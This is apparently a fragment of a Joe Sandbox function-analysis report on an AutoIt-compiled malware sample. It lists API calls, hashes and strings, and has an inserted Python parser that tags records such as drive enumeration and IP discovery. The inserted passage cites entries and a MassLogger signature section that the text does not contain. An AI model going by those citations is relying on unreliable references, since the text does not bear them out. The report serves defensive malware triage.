                                                                            • Opcode ID: 860f64feab4280926e1a902e3dba29189a1eff900972ff07fe985e07c343afde
                                                                            • Instruction ID: ccce0e660618469b8638555fa3bb5437baba16f495b06feb11e0aeb899884d7b
                                                                            • Opcode Fuzzy Hash: 860f64feab4280926e1a902e3dba29189a1eff900972ff07fe985e07c343afde
                                                                            • Instruction Fuzzy Hash: BD11B471504215AFDB27AF60AC4AEDA77ACEF45710F0100A5F545AE092EF70AE898B51
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00325047
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            • __gmtime64_s.LIBCMT ref: 003250E0
                                                                            • __gmtime64_s.LIBCMT ref: 00325116
                                                                            • __gmtime64_s.LIBCMT ref: 00325133
                                                                            • __allrem.LIBCMT ref: 00325189
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003251A5
                                                                            • __allrem.LIBCMT ref: 003251BC
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003251DA
                                                                            • __allrem.LIBCMT ref: 003251F1
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0032520F
                                                                            • __invoke_watson.LIBCMT ref: 00325280
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                            • String ID:
                                                                            • API String ID: 384356119-0
                                                                            • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                            • Instruction ID: 495695f8aae6660d59e21b9ad7365ef1b3f35526cd096c927f51728a0ee60544
                                                                            • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                            • Instruction Fuzzy Hash: E2710A72A01F26ABD7169E79DC82B5A73A8BF10764F158629F410DB6C1E770DE4087D0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00344DF8
                                                                            • GetMenuItemInfoW.USER32(003C1708,000000FF,00000000,00000030), ref: 00344E59
                                                                            • SetMenuItemInfoW.USER32(003C1708,00000004,00000000,00000030), ref: 00344E8F
                                                                            • Sleep.KERNEL32(000001F4), ref: 00344EA1
                                                                            • GetMenuItemCount.USER32(?), ref: 00344EE5
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00344F01
                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00344F2B
                                                                            • GetMenuItemID.USER32(?,?), ref: 00344F70
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00344FB6
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00344FCA
                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00344FEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                            • String ID:
                                                                            • API String ID: 4176008265-0
                                                                            • Opcode ID: 977b8abb2208372f453e2921535f9f2abc345f6f3ca6282098cf83118cde2616
                                                                            • Instruction ID: 34f2ab1a7790ebaae71c11549faeadffdba0601ecca7c3419eccb2b9d711d684
                                                                            • Opcode Fuzzy Hash: 977b8abb2208372f453e2921535f9f2abc345f6f3ca6282098cf83118cde2616
                                                                            • Instruction Fuzzy Hash: 86618B71900359AFDB22CFA4D888EAE7BF8FB01308F15006AF441AB291D731BD49DB21
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00369C98
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00369C9B
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00369CBF
                                                                            • _memset.LIBCMT ref: 00369CD0
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00369CE2
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00369D5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 830647256-0
                                                                            • Opcode ID: d45c013366fa2cff6c92e1eb8ae1290777560b65dff8415d08e9b1da7ac65e55
                                                                            • Instruction ID: 05210265b8ee786c9e5fda6f9fef0093fb728092baba77d44faf72fb48a6ffe7
                                                                            • Opcode Fuzzy Hash: d45c013366fa2cff6c92e1eb8ae1290777560b65dff8415d08e9b1da7ac65e55
                                                                            • Instruction Fuzzy Hash: 89616C75A00208AFDB12DFA4CC81FEEB7B8EB09714F14415AFA05EB292D770AD51DB50
                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003394FE
                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00339549
                                                                            • VariantInit.OLEAUT32(?), ref: 0033955B
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 0033957B
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 003395BE
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 003395D2
                                                                            • VariantClear.OLEAUT32(?), ref: 003395E7
                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 003395F4
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003395FD
                                                                            • VariantClear.OLEAUT32(?), ref: 0033960F
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0033961A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            • Opcode ID: a2bf1de25cc88f25b69eb69c39c57d5798465175c01e184ae2b3c51c9dbc303b
                                                                            • Instruction ID: 8c7e780f98eccbda8a90812f222e7fa206e323d6309ff3fed945665d2813c230
                                                                            • Opcode Fuzzy Hash: a2bf1de25cc88f25b69eb69c39c57d5798465175c01e184ae2b3c51c9dbc303b
                                                                            • Instruction Fuzzy Hash: C7414F31900219EFDB02EFA5D884ADEBB7DFF08354F008065E542A7261DB70EA85CBA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$_memset
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?;$|?;
                                                                            • API String ID: 2862541840-649644195
                                                                            • Opcode ID: 6f264ba66409016886f096a4afa0d5761540c4cbc575eb621dd65bf6be37d444
                                                                            • Instruction ID: 32d60ec4d0ab6507afdac5e57d8457b037945d4b3b5ff0ffd96c6250d27dfe1f
                                                                            • Opcode Fuzzy Hash: 6f264ba66409016886f096a4afa0d5761540c4cbc575eb621dd65bf6be37d444
                                                                            • Instruction Fuzzy Hash: C4919071A00219EBDF26DF95C844FEEBBB8EF45711F108159F915AB2A0DB709948CFA0
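The entries above are the report's per-function records: API calls with their call-site addresses, the referenced strings (the String ID field, '$'-separated), and the API ID digest that Joe Sandbox derives from the API names (CharLowerBuffW, GetDriveTypeW and _wcscpy become BuffCharDriveLowerType_wcscpy). To diff a listing like this against a clean AutoIt3 interpreter build, or to pivot on an API ID across reports, the records are needed as data. The following Python parser is an added example, not Joe Sandbox code and not part of this report; the excerpt it parses is copied from three entries above (the drive-type, host-IP and COM-instantiation functions) with whitespace normalised and some lines omitted, and the triage labels (drive_enumeration, local_ip_discovery, com_instantiation) are this example's own names, not a Joe Sandbox classification.

```python
# Added example, not Joe Sandbox code: turn the report's function-analysis
# entries into records and tag the ones worth a second look during triage.
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Excerpt copied from three entries of this report (drive-type, host-IP and
# COM-instantiation functions); whitespace normalised, some lines omitted.
SAMPLE_REPORT = """\
APIs
• CharLowerBuffW.USER32(0039DC00,0039DC00,0039DC00), ref: 0034D7CE
• GetDriveTypeW.KERNEL32(?,003B3A70,00000061), ref: 0034D898
• _wcscpy.LIBCMT ref: 0034D8C2
Strings
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
APIs
Strings
Similarity
• API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
APIs
  • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
• CoInitialize.OLE32 ref: 0035ADF6
• CoCreateInstance.OLE32(?,00000000,00000017,0038D8FC,?), ref: 0035AE61
Strings
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
"""

SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR:" for nested calls.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                    # call-site address
    subcall_of: Optional[int]   # callee address when the call is nested


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # Similarity / dump key-values

    @property
    def api_names(self) -> set:
        return {a.name for a in self.apis}

    @property
    def strings(self) -> List[str]:
        sid = self.meta.get("String ID", "")   # referenced strings joined by '$'
        return sid.split("$") if sid else []


def parse_entries(text: str) -> List[FunctionEntry]:
    entries: List[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":            # each entry begins with its APIs list
            entries.append(FunctionEntry())
            section = line
        elif line in SECTION_HEADERS:
            section = line
        elif section == "APIs" and (m := API_LINE.match(line)):
            args = m["args"].split(",") if m["args"] is not None else []
            entries[-1].apis.append(ApiCall(
                m["name"], m["module"], args, int(m["ref"], 16),
                int(m["sub"], 16) if m["sub"] else None))
        elif section and (m := KV_LINE.match(line)):
            entries[-1].meta[m["key"].strip()] = m["value"].strip()
    return entries


# Triage labels are this example's own.  Matching also checks the API ID digest,
# which is built from sorted API-name fragments: lowercase C-runtime names survive
# there whole (so the collapsed gethostname/inet_ntoa entry still matches), while
# CamelCase Win32 names are split into words and only match via the APIs list.
TRIAGE_RULES = {
    "drive_enumeration": {"GetDriveTypeW"},
    "local_ip_discovery": {"gethostname", "gethostbyname", "inet_ntoa"},
    "com_instantiation": {"CoCreateInstance", "IIDFromString"},
}


def triage_tags(entry: FunctionEntry) -> List[str]:
    api_id = entry.meta.get("API ID", "")
    return sorted(tag for tag, needles in TRIAGE_RULES.items()
                  if entry.api_names & needles
                  or any(n.islower() and n in api_id for n in needles))
```

Read the tags with the report's own caveat in mind. The strings these functions reference (all/cdrom/fixed/network/ramdisk/removable/unknown, %.15g, "Incorrect Object type in FOR..IN loop") are AutoIt interpreter internals, consistent with the "Binary is likely a compiled AutoIt script file" signature, so a drive_enumeration or local_ip_discovery tag on one of them describes a capability of the runtime, not proof that the embedded script calls it. The MassLogger behaviour listed under Signatures (credential harvesting, Telegram API use, writes to foreign memory) has to be traced through the dynamic evidence and the script the binary carries, not through these runtime functions.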
                                                                            APIs
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • CoInitialize.OLE32 ref: 0035ADF6
                                                                            • CoUninitialize.OLE32 ref: 0035AE01
                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,0038D8FC,?), ref: 0035AE61
                                                                            • IIDFromString.OLE32(?,?), ref: 0035AED4
                                                                            • VariantInit.OLEAUT32(?), ref: 0035AF6E
                                                                            • VariantClear.OLEAUT32(?), ref: 0035AFCF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 834269672-1287834457
                                                                            • Opcode ID: 94680f7ca073971bf6045f251f348316ff1fa485df2fb632dd4a918f537227b1
                                                                            • Instruction ID: fb5a2fe908e3c0a4df480e3cd16e86dd92b688c6e5bfb5eb230d8b3be34c8023
                                                                            • Opcode Fuzzy Hash: 94680f7ca073971bf6045f251f348316ff1fa485df2fb632dd4a918f537227b1
                                                                            • Instruction Fuzzy Hash: 8861BF70208B119FC712EF54C889F6EBBE8AF49715F004649F9859B2A1C770ED48DB93
                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00358168
                                                                            • inet_addr.WSOCK32(?,?,?), ref: 003581AD
                                                                            • gethostbyname.WSOCK32(?), ref: 003581B9
                                                                            • IcmpCreateFile.IPHLPAPI ref: 003581C7
                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00358237
                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0035824D
                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003582C2
                                                                            • WSACleanup.WSOCK32 ref: 003582C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                            • String ID: Ping
                                                                            • API String ID: 1028309954-2246546115
                                                                            • Opcode ID: 6b54a78f7ad0c9dda3cbaa2ed3d6057e8ffe42b0c5c4392ec76a4c39fa288546
                                                                            • Instruction ID: 65ac09c3dde7ef5037428bc9ad7f4778506044dd57138e1ace456eba703903a6
                                                                            • Opcode Fuzzy Hash: 6b54a78f7ad0c9dda3cbaa2ed3d6057e8ffe42b0c5c4392ec76a4c39fa288546
                                                                            • Instruction Fuzzy Hash: F851C2316047009FD712AF24CC45F6ABBE8AF48711F048959FE95EB2E1DB30E905CB41
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0034E396
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0034E40C
                                                                            • GetLastError.KERNEL32 ref: 0034E416
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0034E483
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: 47c4129653b5d2a7ba56cb92f68a1caa4ac3165252001a3dc989b8cf7c01f632
                                                                            • Instruction ID: 589a4741c23b84b31d3d2ec2e4f02f04a0e5e35773d0f8fdd0461c79a79fa63a
                                                                            • Opcode Fuzzy Hash: 47c4129653b5d2a7ba56cb92f68a1caa4ac3165252001a3dc989b8cf7c01f632
                                                                            • Instruction Fuzzy Hash: 74316135A002099FDB03EBA5C995AEDBBF8FF44344F158055E606AF3D1DB70AA01CB51
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0033B98C
                                                                            • GetDlgCtrlID.USER32 ref: 0033B997
                                                                            • GetParent.USER32 ref: 0033B9B3
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0033B9B6
                                                                            • GetDlgCtrlID.USER32(?), ref: 0033B9BF
                                                                            • GetParent.USER32(?), ref: 0033B9DB
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 0033B9DE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1383977212-1403004172
                                                                            • Opcode ID: 9471eebde8112419341b42f98d1e8b14c04125f247b3105e33586354c67cd7d0
                                                                            • Instruction ID: e60b64038fca0e711a52bd3a9322a344c691ab1b2677986a4f444b4b51e98dd1
                                                                            • Opcode Fuzzy Hash: 9471eebde8112419341b42f98d1e8b14c04125f247b3105e33586354c67cd7d0
                                                                            • Instruction Fuzzy Hash: 4F21F5B4900208BFDB06ABA4DCD6EFEBB78EF49300F500259F651972E2DB745815DB20
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0033BA73
                                                                            • GetDlgCtrlID.USER32 ref: 0033BA7E
                                                                            • GetParent.USER32 ref: 0033BA9A
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0033BA9D
                                                                            • GetDlgCtrlID.USER32(?), ref: 0033BAA6
                                                                            • GetParent.USER32(?), ref: 0033BAC2
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 0033BAC5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1383977212-1403004172
                                                                            • Opcode ID: 55eaea45d0861eb97aa7d07e85771afd5cfe307ec301f5a6669755120ea7bcd9
                                                                            • Instruction ID: 919b84bb0da274b777531960df614f3892cec891f4fd83757b40255fa2a886e6
                                                                            • Opcode Fuzzy Hash: 55eaea45d0861eb97aa7d07e85771afd5cfe307ec301f5a6669755120ea7bcd9
                                                                            • Instruction Fuzzy Hash: 1121D4B4A00208BFDB02EBA4DC95EFEBB79EF45300F500155FA51A71E2EBB55919DB20
                                                                            APIs
                                                                            • GetParent.USER32 ref: 0033BAE3
                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 0033BAF8
                                                                            • _wcscmp.LIBCMT ref: 0033BB0A
                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0033BB85
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 1704125052-3381328864
                                                                            • Opcode ID: 318323db73818ae91e509003ebcaf7457c1f020ed521a034a58678acae6702af
                                                                            • Instruction ID: 9688c2e88dd167413df78de316cbf11f40340e9a307380ca01aee32e6e8b3d70
                                                                            • Opcode Fuzzy Hash: 318323db73818ae91e509003ebcaf7457c1f020ed521a034a58678acae6702af
                                                                            • Instruction Fuzzy Hash: 48110276648307FAFA276624EC57DE7F79C9F21724F200122FB14E84D6FFA1A8514624
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 0035B2D5
                                                                            • CoInitialize.OLE32(00000000), ref: 0035B302
                                                                            • CoUninitialize.OLE32 ref: 0035B30C
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 0035B40C
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 0035B539
                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0035B56D
                                                                            • CoGetObject.OLE32(?,00000000,0038D91C,?), ref: 0035B590
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 0035B5A3
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0035B623
                                                                            • VariantClear.OLEAUT32(0038D91C), ref: 0035B633
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2395222682-0
                                                                            • Opcode ID: 5271fd2d5b2f83b2c444ce0e7862a44c25ba5b3e7ec44caf043b50e77cc5bfba
                                                                            • Instruction ID: 137dc624e33e23f6cd239cc09c30a308541651553c58359459979c074374b42a
                                                                            • Opcode Fuzzy Hash: 5271fd2d5b2f83b2c444ce0e7862a44c25ba5b3e7ec44caf043b50e77cc5bfba
                                                                            • Instruction Fuzzy Hash: A5C123B1608305AFC705DF69C884D2BB7E9BF89305F00495DF98A9B261DB71ED09CB52
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00344047
                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003430A5,?,00000001), ref: 0034405B
